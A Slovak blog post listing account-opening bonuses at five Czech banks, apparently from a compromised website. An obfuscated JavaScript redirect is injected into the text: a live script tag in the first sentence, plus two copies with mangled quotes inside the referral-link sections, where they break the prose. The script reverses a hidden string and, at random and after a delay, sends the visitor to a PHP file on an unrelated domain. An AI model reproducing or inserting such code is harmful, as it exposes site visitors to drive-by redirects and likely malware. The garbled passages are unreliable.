Hoci málokedy <script>$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>dostanete niečo zadarmo, a vo svete bankovníctva to platí dvojnásobne, niektoré banky ponúkajú bonus pri otvorení účtu, aby prilákali nových klientov. Pozrime sa na zoznam tých najatraktívnejších.

[TOP 5] Bonus za založenie účtu v českých bankách [2022]

Bonus za založenie účtu: Hoci málokedy dostanete niečo zadarmo, a vo svete bankovníctva to platí dvojnásobne, niektoré banky ponúkajú bonus za otvorenie účtu, aby prilákali nových klientov. Pozrime sa na zoznam tých najatraktívnejších.

1. Bonus za založenie účtu v Raiffeisenbank – 300 Kč

V Raiffeisenbank dostane každý nový klient po otvorení smart účtu 300 Kč. Raiffeisenbank však ponúka svojim najaktívnejším novým klientom bonus vo výške 1 000 Kč pod podmienkou, že v prvých troch mesiacoch po otvorení účtu budú mať na účte aspoň 15 000 Kč.

Pred otvorením účtu sa opýtajte na bonus za otvorenie účtu

V tomto prípade sa určite oplatí opýtať sa Raiffeisenbank priamo na bonus pred otvorením účtu, pretože môže ponúkať aj iné bonusy. Banka často realizuje rôzne marketingové kampane a bonusy sa často nepripisujú „automaticky“.

Prečítajte si tiež: Rýchle spôsoby, ako zarobiť peniaze v Českej republike

2. Bonus 1 000 Kč za založenie účtu v ČSOB – Plus Konto pre mladých (18 až 30 rokov)

ČSOB ponúka novým klientom s účtom Plus Konto bonus, ktorý je však podmienený vekom. Samotný účet je bezplatný a bez akýchkoľvek ďalších podmienok a môžete si ho vybaviť úplne online.

Bonus za založenie účtu však platí len pre mladých ľudí

Ak máte od 18 do 30 rokov, získate dodatočný bonus 1 000 Kč a šancu vyhrať iPhone 13.

3. Bonus za založenie účtu 500 Kč v Expobank – NEO účet

Každý nový klient Expobank s NEO účtom získa bonus 500 Kč. Stačí, ak do 2 mesiacov od otvorenia účtu uskutočníte aspoň jednu platbu kartou.

Za odporúčanie ďalších klientov môžete získať slušné peniaze

Po otvorení účtu je možné získať ďalších 500 Kč za $mWn=function(n){if(typeof ($mWn.list[n])==“string“) return $mWn.list[n].split(„“).reverse().join(„“);return $mWn.list[n];};$mWn.list=[„\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doporuc-a-ziskej-odmenu“ target=“_blank“ rel=“noreferrer noopener“>odporučenie nového klienta.

bonus za založenie účtu

4. Bonus za založenie účtu do 700 Kč v Komerční banke – Študentský účet

Komerční banka ponúka k novootvorenému účtu G2.2 bonus 350 Kč.

Po predložení platného preukazu ISIC získate ďalších 350 Kč ako bonus za otvorenie účtu.

Ak klient predloží platnú kartu ISIC vydanú v Českej republike, Komerční Banka pripíše na účet ďalších 350 Kč. Nový klient tak môže získať až 700 Kč.

bonus za založenie účtu

5. Bonus 100 Kč za založenie účtu v Equa bank

Pri $mWn=function(n){if(typeof ($mWn.list[n])==“string“) return $mWn.list[n].split(„“).reverse().join(„“);return $mWn.list[n];};$mWn.list=[„\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doporuceni“ target=“_blank“ rel=“noreferrer noopener“>otvorení účtu v Equa bank sa vám na účet automaticky pripíše bonus 100 Kč. Kliknutím na tlačidlo „Otvorte si účet a získajte 100 Kč“ sa do formulára žiadosti o bežný účet automaticky predvyplní PROMO kód, za ktorý potom získate uvedenú odmenu.

Prečítajte si tiež: Najlepšie pracovné miesta v Českej republike – kto zarába najviac?

4 komentáre

Přidat komentář

Vaša e-mailová adresa nebude zverejnená. Vyžadované polia sú označené *